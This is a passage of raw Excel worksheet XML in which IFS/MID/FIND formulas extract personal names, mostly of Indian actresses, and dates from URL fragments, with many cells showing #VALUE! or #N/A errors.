    ISNUMBER(FIND("name=",$A81)), MID($A81, FIND("name=",$A81) + 5, LEN($A81) - FIND("name=",$A81)),
    ISNUMBER(FIND("tag/",$A81)), MID($A81, FIND("tag/",$A81) + 4, LEN($A81) - FIND("tag/",$A81)),
    ISNUMBER(FIND("category",$A81)), MID($A81, FIND("category",$A81) + 9, LEN($A81) - FIND("category",$A81)))</f>
        <v>#N/A</v>
      </c>
      <c r="F81" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A82" t="s">
        <v>2282</v>
      </c>
      <c r="B82" t="str">
        <f t="shared" si="4"/>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="C82" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D82" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E82" t="str" cm="1">
        <f t="array" ref="E82">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A82)), MID($A82, FIND("name=",$A82) + 5, LEN($A82) - FIND("name=",$A82)),
    ISNUMBER(FIND("tag/",$A82)), MID($A82, FIND("tag/",$A82) + 4, LEN($A82) - FIND("tag/",$A82)),
    ISNUMBER(FIND("category",$A82)), MID($A82, FIND("category",$A82) + 9, LEN($A82) - FIND("category",$A82)))</f>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="F82" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A83" t="s">
        <v>2283</v>
      </c>
      <c r="B83" t="str">
        <f t="shared" si="4"/>
        <v>Eva%20Lovia</v>
      </c>
      <c r="C83" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D83" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E83" t="str" cm="1">
        <f t="array" ref="E83">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A83)), MID($A83, FIND("name=",$A83) + 5, LEN($A83) - FIND("name=",$A83)),
    ISNUMBER(FIND("tag/",$A83)), MID($A83, FIND("tag/",$A83) + 4, LEN($A83) - FIND("tag/",$A83)),
    ISNUMBER(FIND("category",$A83)), MID($A83, FIND("category",$A83) + 9, LEN($A83) - FIND("category",$A83)))</f>
        <v>Eva%20Lovia</v>
      </c>
      <c r="F83" t="s">
        <v>3311</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A84" t="s">
        <v>2284</v>
      </c>
      <c r="B84" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C84" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D84" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E84" t="e" cm="1">
        <f t="array" ref="E84">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A84)), MID($A84, FIND("name=",$A84) + 5, LEN($A84) - FIND("name=",$A84)),
    ISNUMBER(FIND("tag/",$A84)), MID($A84, FIND("tag/",$A84) + 4, LEN($A84) - FIND("tag/",$A84)),
    ISNUMBER(FIND("category",$A84)), MID($A84, FIND("category",$A84) + 9, LEN($A84) - FIND("category",$A84)))</f>
        <v>#N/A</v>
      </c>
      <c r="F84" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A85" t="s">
        <v>2268</v>
      </c>
      <c r="B85" t="str">
        <f t="shared" si="4"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C85" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D85" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E85" t="str" cm="1">
        <f t="array" ref="E85">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A85)), MID($A85, FIND("name=",$A85) + 5, LEN($A85) - FIND("name=",$A85)),
    ISNUMBER(FIND("tag/",$A85)), MID($A85, FIND("tag/",$A85) + 4, LEN($A85) - FIND("tag/",$A85)),
    ISNUMBER(FIND("category",$A85)), MID($A85, FIND("category",$A85) + 9, LEN($A85) - FIND("category",$A85)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F85" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A86" t="s">
        <v>2285</v>
      </c>
      <c r="B86" t="str">
        <f t="shared" si="4"/>
        <v>Bhumi%20Pednekar%20&amp;date=2023-04-15</v>
      </c>
      <c r="C86" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D86" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E86" t="str" cm="1">
        <f t="array" ref="E86">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A86)), MID($A86, FIND("name=",$A86) + 5, LEN($A86) - FIND("name=",$A86)),
    ISNUMBER(FIND("tag/",$A86)), MID($A86, FIND("tag/",$A86) + 4, LEN($A86) - FIND("tag/",$A86)),
    ISNUMBER(FIND("category",$A86)), MID($A86, FIND("category",$A86) + 9, LEN($A86) - FIND("category",$A86)))</f>
        <v>Bhumi%20Pednekar%20&amp;date=2023-04-15</v>
      </c>
      <c r="F86" t="s">
        <v>3312</v>
      </c>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A87" t="s">
        <v>2286</v>
      </c>
      <c r="B87" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C87" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D87" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E87" t="e" cm="1">
        <f t="array" ref="E87">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A87)), MID($A87, FIND("name=",$A87) + 5, LEN($A87) - FIND("name=",$A87)),
    ISNUMBER(FIND("tag/",$A87)), MID($A87, FIND("tag/",$A87) + 4, LEN($A87) - FIND("tag/",$A87)),
    ISNUMBER(FIND("category",$A87)), MID($A87, FIND("category",$A87) + 9, LEN($A87) - FIND("category",$A87)))</f>
        <v>#N/A</v>
      </c>
      <c r="F87" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A88" t="s">
        <v>2287</v>
      </c>
      <c r="B88" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C88" t="str">
        <f t="shared" si="5"/>
        <v>sruthy-renjith-vaiga/</v>
      </c>
      <c r="D88" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E88" t="str" cm="1">
        <f t="array" ref="E88">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A88)), MID($A88, FIND("name=",$A88) + 5, LEN($A88) - FIND("name=",$A88)),
    ISNUMBER(FIND("tag/",$A88)), MID($A88, FIND("tag/",$A88) + 4, LEN($A88) - FIND("tag/",$A88)),
    ISNUMBER(FIND("category",$A88)), MID($A88, FIND("category",$A88) + 9, LEN($A88) - FIND("category",$A88)))</f>
        <v>sruthy-renjith-vaiga/</v>
      </c>
      <c r="F88" t="s">
        <v>3313</v>
      </c>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A89" t="s">
        <v>2287</v>
      </c>
      <c r="B89" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C89" t="str">
        <f t="shared" si="5"/>
        <v>sruthy-renjith-vaiga/</v>
      </c>
      <c r="D89" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E89" t="str" cm="1">
        <f t="array" ref="E89">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A89)), MID($A89, FIND("name=",$A89) + 5, LEN($A89) - FIND("name=",$A89)),
    ISNUMBER(FIND("tag/",$A89)), MID($A89, FIND("tag/",$A89) + 4, LEN($A89) - FIND("tag/",$A89)),
    ISNUMBER(FIND("category",$A89)), MID($A89, FIND("category",$A89) + 9, LEN($A89) - FIND("category",$A89)))</f>
        <v>sruthy-renjith-vaiga/</v>
      </c>
      <c r="F89" t="s">
        <v>3313</v>
      </c>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A90" t="s">
        <v>2288</v>
      </c>
      <c r="B90" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C90" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D90" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E90" t="e" cm="1">
        <f t="array" ref="E90">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A90)), MID($A90, FIND("name=",$A90) + 5, LEN($A90) - FIND("name=",$A90)),
    ISNUMBER(FIND("tag/",$A90)), MID($A90, FIND("tag/",$A90) + 4, LEN($A90) - FIND("tag/",$A90)),
    ISNUMBER(FIND("category",$A90)), MID($A90, FIND("category",$A90) + 9, LEN($A90) - FIND("category",$A90)))</f>
        <v>#N/A</v>
      </c>
      <c r="F90" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A91" t="s">
        <v>2289</v>
      </c>
      <c r="B91" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C91" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D91" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E91" t="e" cm="1">
        <f t="array" ref="E91">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A91)), MID($A91, FIND("name=",$A91) + 5, LEN($A91) - FIND("name=",$A91)),
    ISNUMBER(FIND("tag/",$A91)), MID($A91, FIND("tag/",$A91) + 4, LEN($A91) - FIND("tag/",$A91)),
    ISNUMBER(FIND("category",$A91)), MID($A91, FIND("category",$A91) + 9, LEN($A91) - FIND("category",$A91)))</f>
        <v>#N/A</v>
      </c>
      <c r="F91" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A92" t="s">
        <v>2268</v>
      </c>
      <c r="B92" t="str">
        <f t="shared" si="4"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C92" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D92" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E92" t="str" cm="1">
        <f t="array" ref="E92">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A92)), MID($A92, FIND("name=",$A92) + 5, LEN($A92) - FIND("name=",$A92)),
    ISNUMBER(FIND("tag/",$A92)), MID($A92, FIND("tag/",$A92) + 4, LEN($A92) - FIND("tag/",$A92)),
    ISNUMBER(FIND("category",$A92)), MID($A92, FIND("category",$A92) + 9, LEN($A92) - FIND("category",$A92)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F92" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A93" t="s">
        <v>2248</v>
      </c>
      <c r="B93" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C93" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D93" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E93" t="e" cm="1">
        <f t="array" ref="E93">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A93)), MID($A93, FIND("name=",$A93) + 5, LEN($A93) - FIND("name=",$A93)),
    ISNUMBER(FIND("tag/",$A93)), MID($A93, FIND("tag/",$A93) + 4, LEN($A93) - FIND("tag/",$A93)),
    ISNUMBER(FIND("category",$A93)), MID($A93, FIND("category",$A93) + 9, LEN($A93) - FIND("category",$A93)))</f>
        <v>#N/A</v>
      </c>
      <c r="F93" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A94" t="s">
        <v>2290</v>
      </c>
      <c r="B94" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C94" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D94" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E94" t="e" cm="1">
        <f t="array" ref="E94">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A94)), MID($A94, FIND("name=",$A94) + 5, LEN($A94) - FIND("name=",$A94)),
    ISNUMBER(FIND("tag/",$A94)), MID($A94, FIND("tag/",$A94) + 4, LEN($A94) - FIND("tag/",$A94)),
    ISNUMBER(FIND("category",$A94)), MID($A94, FIND("category",$A94) + 9, LEN($A94) - FIND("category",$A94)))</f>
        <v>#N/A</v>
      </c>
      <c r="F94" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="95" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A95" t="s">
        <v>2291</v>
      </c>
      <c r="B95" t="str">
        <f t="shared" si="4"/>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="C95" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D95" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E95" t="str" cm="1">
        <f t="array" ref="E95">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A95)), MID($A95, FIND("name=",$A95) + 5, LEN($A95) - FIND("name=",$A95)),
    ISNUMBER(FIND("tag/",$A95)), MID($A95, FIND("tag/",$A95) + 4, LEN($A95) - FIND("tag/",$A95)),
    ISNUMBER(FIND("category",$A95)), MID($A95, FIND("category",$A95) + 9, LEN($A95) - FIND("category",$A95)))</f>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="F95" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="96" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A96" t="s">
        <v>2279</v>
      </c>
      <c r="B96" t="str">
        <f t="shared" si="4"/>
        <v>Sureet%20Kular</v>
      </c>
      <c r="C96" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D96" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E96" t="str" cm="1">
        <f t="array" ref="E96">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A96)), MID($A96, FIND("name=",$A96) + 5, LEN($A96) - FIND("name=",$A96)),
    ISNUMBER(FIND("tag/",$A96)), MID($A96, FIND("tag/",$A96) + 4, LEN($A96) - FIND("tag/",$A96)),
    ISNUMBER(FIND("category",$A96)), MID($A96, FIND("category",$A96) + 9, LEN($A96) - FIND("category",$A96)))</f>
        <v>Sureet%20Kular</v>
      </c>
      <c r="F96" t="s">
        <v>3309</v>
      </c>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A97" t="s">
        <v>2248</v>
      </c>
      <c r="B97" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C97" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D97" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E97" t="e" cm="1">
        <f t="array" ref="E97">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A97)), MID($A97, FIND("name=",$A97) + 5, LEN($A97) - FIND("name=",$A97)),
    ISNUMBER(FIND("tag/",$A97)), MID($A97, FIND("tag/",$A97) + 4, LEN($A97) - FIND("tag/",$A97)),
    ISNUMBER(FIND("category",$A97)), MID($A97, FIND("category",$A97) + 9, LEN($A97) - FIND("category",$A97)))</f>
        <v>#N/A</v>
      </c>
      <c r="F97" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A98" t="s">
        <v>2292</v>
      </c>
      <c r="B98" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C98" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D98" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E98" t="e" cm="1">
        <f t="array" ref="E98">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A98)), MID($A98, FIND("name=",$A98) + 5, LEN($A98) - FIND("name=",$A98)),
    ISNUMBER(FIND("tag/",$A98)), MID($A98, FIND("tag/",$A98) + 4, LEN($A98) - FIND("tag/",$A98)),
    ISNUMBER(FIND("category",$A98)), MID($A98, FIND("category",$A98) + 9, LEN($A98) - FIND("category",$A98)))</f>
        <v>#N/A</v>
      </c>
      <c r="F98" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A99" t="s">
        <v>2293</v>
      </c>
      <c r="B99" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C99" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D99" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E99" t="e" cm="1">
        <f t="array" ref="E99">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A99)), MID($A99, FIND("name=",$A99) + 5, LEN($A99) - FIND("name=",$A99)),
    ISNUMBER(FIND("tag/",$A99)), MID($A99, FIND("tag/",$A99) + 4, LEN($A99) - FIND("tag/",$A99)),
    ISNUMBER(FIND("category",$A99)), MID($A99, FIND("category",$A99) + 9, LEN($A99) - FIND("category",$A99)))</f>
        <v>#N/A</v>
      </c>
      <c r="F99" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A100" t="s">
        <v>2294</v>
      </c>
      <c r="B100" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C100" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D100" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E100" t="e" cm="1">
        <f t="array" ref="E100">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A100)), MID($A100, FIND("name=",$A100) + 5, LEN($A100) - FIND("name=",$A100)),
    ISNUMBER(FIND("tag/",$A100)), MID($A100, FIND("tag/",$A100) + 4, LEN($A100) - FIND("tag/",$A100)),
    ISNUMBER(FIND("category",$A100)), MID($A100, FIND("category",$A100) + 9, LEN($A100) - FIND("category",$A100)))</f>
        <v>#N/A</v>
      </c>
      <c r="F100" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A101" t="s">
        <v>2295</v>
      </c>
      <c r="B101" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C101" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D101" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E101" t="e" cm="1">
        <f t="array" ref="E101">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A101)), MID($A101, FIND("name=",$A101) + 5, LEN($A101) - FIND("name=",$A101)),
    ISNUMBER(FIND("tag/",$A101)), MID($A101, FIND("tag/",$A101) + 4, LEN($A101) - FIND("tag/",$A101)),
    ISNUMBER(FIND("category",$A101)), MID($A101, FIND("category",$A101) + 9, LEN($A101) - FIND("category",$A101)))</f>
        <v>#N/A</v>
      </c>
      <c r="F101" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A102" t="s">
        <v>2296</v>
      </c>
      <c r="B102" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C102" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D102" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E102" t="e" cm="1">
        <f t="array" ref="E102">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A102)), MID($A102, FIND("name=",$A102) + 5, LEN($A102) - FIND("name=",$A102)),
    ISNUMBER(FIND("tag/",$A102)), MID($A102, FIND("tag/",$A102) + 4, LEN($A102) - FIND("tag/",$A102)),
    ISNUMBER(FIND("category",$A102)), MID($A102, FIND("category",$A102) + 9, LEN($A102) - FIND("category",$A102)))</f>
        <v>#N/A</v>
      </c>
      <c r="F102" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A103" t="s">
        <v>2297</v>
      </c>
      <c r="B103" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C103" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D103" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E103" t="e" cm="1">
        <f t="array" ref="E103">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A103)), MID($A103, FIND("name=",$A103) + 5, LEN($A103) - FIND("name=",$A103)),
    ISNUMBER(FIND("tag/",$A103)), MID($A103, FIND("tag/",$A103) + 4, LEN($A103) - FIND("tag/",$A103)),
    ISNUMBER(FIND("category",$A103)), MID($A103, FIND("category",$A103) + 9, LEN($A103) - FIND("category",$A103)))</f>
        <v>#N/A</v>
      </c>
      <c r="F103" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A104" t="s">
        <v>2298</v>
      </c>
      <c r="B104" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C104" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D104" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E104" t="e" cm="1">
        <f t="array" ref="E104">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A104)), MID($A104, FIND("name=",$A104) + 5, LEN($A104) - FIND("name=",$A104)),
    ISNUMBER(FIND("tag/",$A104)), MID($A104, FIND("tag/",$A104) + 4, LEN($A104) - FIND("tag/",$A104)),
    ISNUMBER(FIND("category",$A104)), MID($A104, FIND("category",$A104) + 9, LEN($A104) - FIND("category",$A104)))</f>
        <v>#N/A</v>
      </c>
      <c r="F104" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="105" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A105" t="s">
        <v>2299</v>
      </c>
      <c r="B105" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C105" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D105" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E105" t="e" cm="1">
        <f t="array" ref="E105">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A105)), MID($A105, FIND("name=",$A105) + 5, LEN($A105) - FIND("name=",$A105)),
    ISNUMBER(FIND("tag/",$A105)), MID($A105, FIND("tag/",$A105) + 4, LEN($A105) - FIND("tag/",$A105)),
    ISNUMBER(FIND("category",$A105)), MID($A105, FIND("category",$A105) + 9, LEN($A105) - FIND("category",$A105)))</f>
        <v>#N/A</v>
      </c>
      <c r="F105" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="106" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A106" t="s">
        <v>2300</v>
      </c>
      <c r="B106" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C106" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D106" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E106" t="e" cm="1">
        <f t="array" ref="E106">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A106)), MID($A106, FIND("name=",$A106) + 5, LEN($A106) - FIND("name=",$A106)),
    ISNUMBER(FIND("tag/",$A106)), MID($A106, FIND("tag/",$A106) + 4, LEN($A106) - FIND("tag/",$A106)),
    ISNUMBER(FIND("category",$A106)), MID($A106, FIND("category",$A106) + 9, LEN($A106) - FIND("category",$A106)))</f>
        <v>#N/A</v>
      </c>
      <c r="F106" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="107" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A107" t="s">
        <v>2268</v>
      </c>
      <c r="B107" t="str">
        <f t="shared" si="4"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C107" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D107" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E107" t="str" cm="1">
        <f t="array" ref="E107">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A107)), MID($A107, FIND("name=",$A107) + 5, LEN($A107) - FIND("name=",$A107)),
    ISNUMBER(FIND("tag/",$A107)), MID($A107, FIND("tag/",$A107) + 4, LEN($A107) - FIND("tag/",$A107)),
    ISNUMBER(FIND("category",$A107)), MID($A107, FIND("category",$A107) + 9, LEN($A107) - FIND("category",$A107)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F107" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="108" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A108" t="s">
        <v>2291</v>
      </c>
      <c r="B108" t="str">
        <f t="shared" si="4"/>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="C108" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D108" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E108" t="str" cm="1">
        <f t="array" ref="E108">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A108)), MID($A108, FIND("name=",$A108) + 5, LEN($A108) - FIND("name=",$A108)),
    ISNUMBER(FIND("tag/",$A108)), MID($A108, FIND("tag/",$A108) + 4, LEN($A108) - FIND("tag/",$A108)),
    ISNUMBER(FIND("category",$A108)), MID($A108, FIND("category",$A108) + 9, LEN($A108) - FIND("category",$A108)))</f>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="F108" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="109" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A109" t="s">
        <v>2291</v>
      </c>
      <c r="B109" t="str">
        <f t="shared" si="4"/>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="C109" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D109" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E109" t="str" cm="1">
        <f t="array" ref="E109">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A109)), MID($A109, FIND("name=",$A109) + 5, LEN($A109) - FIND("name=",$A109)),
    ISNUMBER(FIND("tag/",$A109)), MID($A109, FIND("tag/",$A109) + 4, LEN($A109) - FIND("tag/",$A109)),
    ISNUMBER(FIND("category",$A109)), MID($A109, FIND("category",$A109) + 9, LEN($A109) - FIND("category",$A109)))</f>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="F109" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="110" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A110" t="s">
        <v>2291</v>
      </c>
      <c r="B110" t="str">
        <f t="shared" si="4"/>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="C110" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D110" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E110" t="str" cm="1">
        <f t="array" ref="E110">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A110)), MID($A110, FIND("name=",$A110) + 5, LEN($A110) - FIND("name=",$A110)),
    ISNUMBER(FIND("tag/",$A110)), MID($A110, FIND("tag/",$A110) + 4, LEN($A110) - FIND("tag/",$A110)),
    ISNUMBER(FIND("category",$A110)), MID($A110, FIND("category",$A110) + 9, LEN($A110) - FIND("category",$A110)))</f>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="F110" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="111" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A111" t="s">
        <v>2301</v>
      </c>
      <c r="B111" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C111" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D111" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E111" t="e" cm="1">
        <f t="array" ref="E111">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A111)), MID($A111, FIND("name=",$A111) + 5, LEN($A111) - FIND("name=",$A111)),
    ISNUMBER(FIND("tag/",$A111)), MID($A111, FIND("tag/",$A111) + 4, LEN($A111) - FIND("tag/",$A111)),
    ISNUMBER(FIND("category",$A111)), MID($A111, FIND("category",$A111) + 9, LEN($A111) - FIND("category",$A111)))</f>
        <v>#N/A</v>
